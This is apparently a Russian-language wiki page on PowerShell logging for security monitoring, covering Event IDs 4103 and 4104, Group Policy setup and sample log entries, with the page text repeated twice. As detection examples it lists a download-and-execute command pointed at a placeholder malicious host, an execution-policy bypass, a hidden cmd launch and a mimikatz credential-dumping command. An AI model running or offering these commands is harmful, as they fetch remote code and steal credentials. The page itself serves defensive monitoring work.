Логирование PowerShell

Логирование PowerShell — это критически важный элемент мониторинга безопасности в современных средах, так как PowerShell часто используется злоумышленниками для выполнения вредоносных скриптов, обхода защиты и выполнения атак. Включение логирования PowerShell позволяет отслеживать выполняемые команды и скрипты, что помогает обнаруживать подозрительную активность.

Типы событий

Основные типы логирования:

Модуль аудита PowerShell (Module Logging) - Модуль аудита регистрирует все команды, выполняемые в PowerShell. Логи сохраняются в Журнале событий Windows в разделе Microsoft-Windows-PowerShell/Operational с Event ID 4103
Логирование блоков скриптов (Script Block Logging) - Логирование блоков скриптов регистрирует содержимое скриптов, выполняемых в PowerShell. Логи сохраняются в Журнале событий Windows в разделе Microsoft-Windows-PowerShell/Operational с Event ID 4104

Если скрипт PowerShell очень длинный, событие с ID 4104 регистрируется как несколько событий. В каждом событии вы найдете поле Script Block, которое содержит часть тела скрипта. Также в каждом событии есть указание, на сколько всего блоков был разбит скрипт и порядковый номер текущего.

Логирование транскрипций (Transcript Logging). Логирование транскрипций сохраняет все действия, выполненные в сессии PowerShell, в текстовый файл.

Мы обычно используем только 4103 и 4104

Настройка логирования Powershell

Чтобы настроить аудит событий PowerShell с помощью групповых политик и включить модуль Script Block Logging, выполните

Откройте Редактор групповых политик
Перейдите в раздел: Конфигурация компьютера → Политики → Административные шаблоны → Компоненты Windows → Windows PowerShell.
Выберите "Включить ведение журнала модулей", "Включить ведение журнала блоков скриптов" и "Включить ведение журнала транскрипций" Для последнего укажите путь для сохранения транскрипций (например, C:\PSLogs).

Примеры подозрительных команд и скриптов

Загрузка и выполнение скриптов из интернета: Ищите команды, связанные с обходом защиты, запуском скриптов или взаимодействием с внешними ресурсами (например, Invoke-Expression, DownloadString, Net.WebClient)
```
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.site/script.ps1')
```

Обход защиты:

Set-ExecutionPolicy Bypass -Scope Process

Создание скрытых процессов:

Start-Process -WindowStyle Hidden -FilePath "C:\Windows\System32\cmd.exe"

Использование утилит для взлома:
```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
```

Сравнение событий PowerShell Event ID 4103 и Event ID 4104

Оба события связаны с логированием активности PowerShell, но они регистрируют разные аспекты выполнения команд и скриптов.

Event ID 4103: Логирование модулей (Module Logging)

Что регистрируется:
- Отдельные команды, выполняемые в PowerShell.
- Регистрируется каждая команда, введенная в консоли или выполненная в скрипте.
Когда регистрируется:
- При выполнении любой команды в PowerShell, если включено логирование модулей.
Как выглядит cmdlet alias:
- Если используется алиас (например, gci вместо Get-ChildItem), в логах будет записан алиас.

Пользователь выполняет команду:

gci C:\Windows

В логах будет зарегистрировано:

{
  "EventID": 4103,
  "Message": "CommandInvocation(Get-ChildItem): \"gci\"",
  "CommandLine": "gci C:\\Windows",
  "User": "DOMAIN\\Username"
}

Event ID 4104: Логирование блоков скриптов (Script Block Logging)

Что регистрируется:
- Полное содержимое скриптов, выполняемых в PowerShell.
- Регистрируется весь блок кода, включая команды, циклы, условия и функции.
Когда регистрируется:
- При выполнении скриптов или многострочных команд в PowerShell.
- Также регистрируется, если команда выполняется в контексте скрипта (например, через Invoke-Expression).
Как выглядит cmdlet alias:
- Если используется алиас, в логах будет записан алиас, но также будет виден полный блок скрипта.

Пользователь выполняет скрипт:

if ($true) {
    ps
}

В логах будет зарегистрировано:

{
  "EventID": 4104,
  "Message": "ScriptBlock: if ($true) { ps }",
  "ScriptBlock": "if ($true) { Get-Process }",
  "User": "DOMAIN\\Username"
}

Известные Powershell инструменты

PreviousРасширенный аудит Windows NextЛогирование командной строки

Last updated 2 months ago

Логирование PowerShell

Типы событий

Основные типы логирования:

Модуль аудита PowerShell (Module Logging) - Модуль аудита регистрирует все команды, выполняемые в PowerShell. Логи сохраняются в Журнале событий Windows в разделе Microsoft-Windows-PowerShell/Operational с Event ID 4103
Логирование блоков скриптов (Script Block Logging) - Логирование блоков скриптов регистрирует содержимое скриптов, выполняемых в PowerShell. Логи сохраняются в Журнале событий Windows в разделе Microsoft-Windows-PowerShell/Operational с Event ID 4104

Логирование транскрипций (Transcript Logging). Логирование транскрипций сохраняет все действия, выполненные в сессии PowerShell, в текстовый файл.

Мы обычно используем только 4103 и 4104

Настройка логирования Powershell

Чтобы настроить аудит событий PowerShell с помощью групповых политик и включить модуль Script Block Logging, выполните

Откройте Редактор групповых политик
Перейдите в раздел: Конфигурация компьютера → Политики → Административные шаблоны → Компоненты Windows → Windows PowerShell.
Выберите "Включить ведение журнала модулей", "Включить ведение журнала блоков скриптов" и "Включить ведение журнала транскрипций" Для последнего укажите путь для сохранения транскрипций (например, C:\PSLogs).

Примеры подозрительных команд и скриптов

Загрузка и выполнение скриптов из интернета: Ищите команды, связанные с обходом защиты, запуском скриптов или взаимодействием с внешними ресурсами (например, Invoke-Expression, DownloadString, Net.WebClient)
```
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.site/script.ps1')
```

Обход защиты:

Set-ExecutionPolicy Bypass -Scope Process

Создание скрытых процессов:

Start-Process -WindowStyle Hidden -FilePath "C:\Windows\System32\cmd.exe"

Использование утилит для взлома:
```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
```

Сравнение событий PowerShell Event ID 4103 и Event ID 4104

Event ID 4103: Логирование модулей (Module Logging)

Что регистрируется:
- Отдельные команды, выполняемые в PowerShell.
- Регистрируется каждая команда, введенная в консоли или выполненная в скрипте.
Когда регистрируется:
- При выполнении любой команды в PowerShell, если включено логирование модулей.
Как выглядит cmdlet alias:
- Если используется алиас (например, gci вместо Get-ChildItem), в логах будет записан алиас.

Пользователь выполняет команду:

gci C:\Windows

В логах будет зарегистрировано:

{
  "EventID": 4103,
  "Message": "CommandInvocation(Get-ChildItem): \"gci\"",
  "CommandLine": "gci C:\\Windows",
  "User": "DOMAIN\\Username"
}

Event ID 4104: Логирование блоков скриптов (Script Block Logging)

Что регистрируется:
- Полное содержимое скриптов, выполняемых в PowerShell.
- Регистрируется весь блок кода, включая команды, циклы, условия и функции.
Когда регистрируется:
- При выполнении скриптов или многострочных команд в PowerShell.
- Также регистрируется, если команда выполняется в контексте скрипта (например, через Invoke-Expression).
Как выглядит cmdlet alias:
- Если используется алиас, в логах будет записан алиас, но также будет виден полный блок скрипта.

Пользователь выполняет скрипт:

if ($true) {
    ps
}

В логах будет зарегистрировано:

{
  "EventID": 4104,
  "Message": "ScriptBlock: if ($true) { ps }",
  "ScriptBlock": "if ($true) { Get-Process }",
  "User": "DOMAIN\\Username"
}

Известные Powershell инструменты

PreviousРасширенный аудит Windows NextЛогирование командной строки

Last updated 2 months ago